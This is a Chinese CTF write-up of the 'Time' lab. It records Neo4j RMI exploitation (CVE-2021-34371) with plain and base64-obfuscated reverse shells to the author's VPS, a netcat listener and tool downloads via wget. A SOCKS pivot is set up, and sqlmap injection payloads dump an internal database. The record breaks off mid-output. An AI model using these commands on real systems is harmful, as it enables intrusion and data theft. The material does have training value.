春秋云镜Time

flag1

fscan扫一下

E:\CTFFIT\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\fscan>fscan -h 39.99.143.95

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.143.95:7687 open
39.99.143.95:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle https://39.99.143.95:7687 code:400 len:50     title:None
已完成 2/2
[*] 扫描结束,耗时: 45.7250451s

发现有7687端口，这里没有什么破绽，通过搜索可以知道7687是neo4j的运行端口
https://www.cnblogs.com/Kawakaze777/p/18153842

是这个漏洞，直接在本地用jar包打exp，弹shell到自己的vps上

PS D:\Edge\CVE-2021-34371.jar-main\CVE-2021-34371.jar-main> java -jar rhino_gadget.jar rmi://39.99.143.95:1337 "sh -i >& /dev/tcp/38.55.99.185/7777 0>&1"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
        java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
        java.io.IOException
[+] Exploit completed

这里我直接弹shell不起作用，很是怪异，后面查阅资料，发现这里需要通过base64编码解码传递弹shell的信息，才能过成功

PS D:\Edge\CVE-2021-34371.jar-main\CVE-2021-34371.jar-main> java -jar rhino_gadget.jar rmi://39.99.143.95:1337 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMzguNTUuOTkuMTg1Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
        java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
        java.io.IOException
[+] Exploit completed

接下来在vps上进行操作

root@dkhkdB44QUxpXagmmGyT:~/neoj4# nc -lnvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.99.143.95 49118
sh: 0: can't access tty; job control turned off
$ whoami
neo4j
$ 
$ script -qc /bin/bash /dev/null
neo4j@ubuntu:/$ 

可以看到已经成功弹到并且稳定shell了，拿flag01

neo4j@ubuntu:~$ cat f*
cat f*
 ██████████ ██                    
░░░░░██░░░ ░░                     
    ░██     ██ ██████████   █████ 
    ░██    ░██░░██░░██░░██ ██░░░██
    ░██    ░██ ░██ ░██ ░██░███████
    ░██    ░██ ░██ ░██ ░██░██░░░░ 
    ░██    ░██ ███ ░██ ░██░░██████
    ░░     ░░ ░░░  ░░  ░░  ░░░░░░ 


flag01: flag{ed2ae7bf-93c3-41ac-ad44-26c428d41218}

Do you know the authentication process of Kerberos? 
......This will be the key to your progress.

flag2

接下来需要传fscan和搭建内网代理的东西上去，使用wget

这里把你要传的都放在自己vps的/var/www/html目录下，然后启动python的web服务

root@dkhkdB44QUxpXagmmGyT:/var/www/html# ls
fscan  linux_x64_agent
root@dkhkdB44QUxpXagmmGyT:/var/www/html# cd /
root@dkhkdB44QUxpXagmmGyT:/# cd /var/www/html
root@dkhkdB44QUxpXagmmGyT:/var/www/html# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
39.99.143.95 - - [16/Nov/2025 16:59:14] "GET /fscan HTTP/1.1" 200 -

然后在目标机器的shell上面wget即可

neo4j@ubuntu:/tmp$ wget 38.55.99.185/fscan
wget 38.55.99.185/fscan
--2025-11-16 17:01:01--  http://38.55.99.185/fscan
Connecting to 38.55.99.185:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7100304 (6.8M) [application/octet-stream]
Saving to: ‘fscan’

fscan               100%[===================>]   6.77M  13.0MB/s    in 0.5s    

2025-11-16 17:01:02 (13.0 MB/s) - ‘fscan’ saved [7100304/7100304]

neo4j@ubuntu:/tmp$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.6.36  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe32:3b4c  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:32:3b:4c  txqueuelen 1000  (Ethernet)
        RX packets 133387  bytes 178374703 (178.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28601  bytes 4972987 (4.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1336  bytes 123734 (123.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1336  bytes 123734 (123.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

看到内网的网段，直接使用fscan进行扫描

neo4j@ubuntu:/tmp$ chmod +x fscan
chmod +x fscan

neo4j@ubuntu:/tmp$ ./fscan -h 172.22.6.36/24
./fscan -h 172.22.6.36/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.36     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 4
172.22.6.12:88 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:7687 open
172.22.6.36:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo 
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetBios 172.22.6.25     XIAORANG\WIN2019              
[*] NetInfo 
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.6.12	(Windows Server 2016 Datacenter 14393)
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None
已完成 11/11
[*] 扫描结束,耗时: 12.294552591s

可以发现四台存活的内网主机，36这台已经被我们getshell了，接下来进行内网代理的搭建

neo4j@ubuntu:/tmp$ ./linux_x64_agent -c 38.55.99.185:1111
./linux_x64_agent -c 38.55.99.185:1111
2025/11/16 17:17:51 [*] Starting agent node actively.Connecting to 38.55.99.185:1111

[*] Starting admin node on port 1111

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.99.143.95:34284 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 

先访问上面扫到的web端，是存在sql注入的

hackbar直接抓包，然后用sqlmap干他就行了

POST /index.php HTTP/1.1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

password=123&username=admin

这个包缺少一个host，加上即可

POST /index.php HTTP/1.1
Host: 172.22.6.38
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

password=123&username=admin

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt --dbs
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___["]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . [.]     | .'| . |                                                                                                               
|___|_  ["]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:40:23 /2025-11-16/

[17:40:23] [INFO] parsing HTTP request from 'test.txt'
[17:40:24] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.185:1123 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:40:24] [INFO] testing if the target URL content is stable22.6.38:80 
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:25] [INFO] target URL content is stable
[17:40:25] [INFO] testing if POST parameter 'password' is dynamic
[17:40:25] [WARNING] POST parameter 'password' does not appear to be dynamic
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:25] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[17:40:25] [INFO] testing for SQL injection on POST parameter 'password'
[17:40:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  OK
 ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:40:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:31] [INFO] testing 'Generic inline queries'  ...  172.22.6.38:80 
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:40:46] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:41:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:41:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:41:16] [INFO] target URL appears to be UNION injectable with 3 columns
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:41:16] [INFO] POST parameter 'password' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N]  ...  OK
y
[17:41:20] [INFO] testing if POST parameter 'username' is dynamic
[17:41:20] [WARNING] POST parameter 'username' does not appear to be dynamic
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:41:21] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[17:41:21] [INFO] testing for SQL injection on POST parameter 'username'
[17:41:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  OK
 ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:41:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:41:22] [INFO] testing 'Generic inline queries'  ...  172.22.6.38:80 
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[17:41:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[17:41:27] [WARNING] POST parameter 'username' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 91 HTTP(s) requests:
---
Parameter: password (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:41:27] [INFO] the back-end DBMS is MySQL
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:41:28] [INFO] fetching database names
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
available databases [5]:
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys

[17:41:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:41:28 /2025-11-16/

                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db --table
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___["]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . ["]     | .'| . |                                                                                                               
|___|_  [(]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

Usage: python3 sqlmap [options]

sqlmap: error: ambiguous option: --table (--table-prefix, --tables?)
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db --tables
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___[(]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . ["]     | .'| . |                                                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:41:52 /2025-11-16/

[17:41:52] [INFO] parsing HTTP request from 'test.txt'
[17:41:52] [INFO] resuming back-end DBMS 'mysql' 
[17:41:52] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.185:1123 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:41:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:41:52] [INFO] fetching tables for database: 'oa_db'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80 Database: oa_db
[3 tables]
+------------+
| oa_admin   |
| oa_f1Agggg |
| oa_users   |
+------------+

[17:41:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:41:52 /2025-11-16/

                                                                            

这里有flag文件，直接读取即可

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_f1Agggg --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___[)]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . ["]     | .'| . |                                                                                                               
|___|_  [.]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:44:18 /2025-11-16/

[17:44:18] [INFO] parsing HTTP request from 'test.txt'
[17:44:18] [INFO] resuming back-end DBMS 'mysql' 
[17:44:18] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.185:1123 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:44:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:44:19] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db'
[17:44:19] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  OK
 ...  OK
Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

[17:44:19] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv'
[17:44:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:44:19 /2025-11-16/

再看另外两个表

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_admin --dump  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___[,]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . [']     | .'| . |                                                                                                               
|___|_  [)]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:31 /2025-11-16/

[17:45:31] [INFO] parsing HTTP request from 'test.txt'
[17:45:31] [INFO] resuming back-end DBMS 'mysql' 
[17:45:31] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.185:1123 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
sqlmap resumed the following injection point(s) from stored session:
---
